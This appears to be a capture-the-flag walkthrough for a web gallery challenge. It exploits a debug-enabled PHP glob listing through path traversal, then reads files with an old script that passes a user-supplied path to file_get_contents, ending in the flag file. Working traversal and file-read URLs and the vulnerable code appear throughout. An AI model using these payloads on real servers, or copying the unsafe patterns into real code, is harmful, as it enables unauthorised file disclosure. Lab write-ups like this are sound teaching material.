A seemingly innocuous galleria, but nothing is ever innocuous. First up, view the home page's source and you'll spot some interesting looking code down at the bottom:

```
// ~~~~~~ mY oWn CuStOm CoDe ~~~~~~
// Written by developer_user
var canRun = 0;
$(document).ready(function(){
$.ajax({url: "get_files_items.php?debug=FALSE&folder=images", async: false, success: function(result){
$("#get_pictures").html(result);
}});
runMe();
});

// ~~~~~~ eNd mY oWn CuStOm CoDe ~~~~~~
```

Hmm, looks like possible path traversal? Throw that path into the URL to get: [http://134.122.94.112/get_files_items.php?debug=TRUE&folder=images](http://134.122.94.112/get_files_items.php?debug=TRUE&folder=images)

You'll notice that it spits out the directory contents. Turning debug to TRUE yields some more information:

```
DEBUG Message: Getting a list op all the files in folder: images from the param folder using PHP function 'glob'.

Code Debug:
$folder = $_REQUEST["folder"];
$pictues = glob($folder . "/*");
```

Since it's just using glob, we can use it to list the files of any directory on the drive. Let's try some relative paths and see where that gets us: [http://134.122.94.112/get_files_items.php?debug=TRUE&folder=../](http://134.122.94.112/get_files_items.php?debug=TRUE&folder=../)

One set of links loads up, and if you look at the Work 01 and Model links you can see which files and directories are in the path specified. With just ../, only an html folder comes up. Using `get_files_items.php` we can see what's inside the html folder: [http://134.122.94.112/get_files_items.php?debug=TRUE&folder=../html](http://134.122.94.112/get_files_items.php?debug=TRUE&folder=../html)

Scrolling through the links you'll find a folder titled `clue_folder_good_job`. Since the html directory is the root path of the webserver, to access it you can just go to: [http://134.122.94.112/clue_folder_good_job/](http://134.122.94.112/clue_folder_good_job/)

In it, you'll find `clue.txt`, the contents of which are:

```
Well Done!
The developer wrote the secret key somewhere on machine...
Clue: The file you are using to exploit has an older version somewhere, good luck.
```

Using the clue, let's keep looking through that html directory. You'll find a directory called `php_folder_cant_find_me_by_brute_force`. Inside, you'll find a php script called `old_get_files_items.php`. Upon loading, it complains about debug mode being off. Expecting the syntax to be the same as the newer version, at a parameter of `?debug=TRUE` to the query to get:

```
Code Debug:
$file = $_REQUEST["file"];
print file_get_contents($file);
```

What this older script is doing is letting us view the contents of files now, rather than the file tree. We still need to find the flag, though. The first place I thought to check was in the system's home directory, so I navigated to: [http://134.122.94.112/get_files_items.php?debug=TRUE&folder=/home/](http://134.122.94.112/get_files_items.php?debug=TRUE&folder=/home/)

Inside the home directory, there is a user `developer`. Inside the user's home folder, there is a `FLAG.txt`. Bingo! Now, using the `old_get_files_items.php` from before, we can go to: [http://134.122.94.112/php_folder_cant_find_me_by_brute_force/old_get_files_items.php?debug=TRUE&file=/home/developer/FLAG.txt](http://134.122.94.112/php_folder_cant_find_me_by_brute_force/old_get_files_items.php?debug=TRUE&file=/home/developer/FLAG.txt)

```
Code Debug:
$file = $_REQUEST["file"];
print file_get_contents($file);

S1FLAG.xDI0UiExW4pALibNe8aq4BDvHuk
```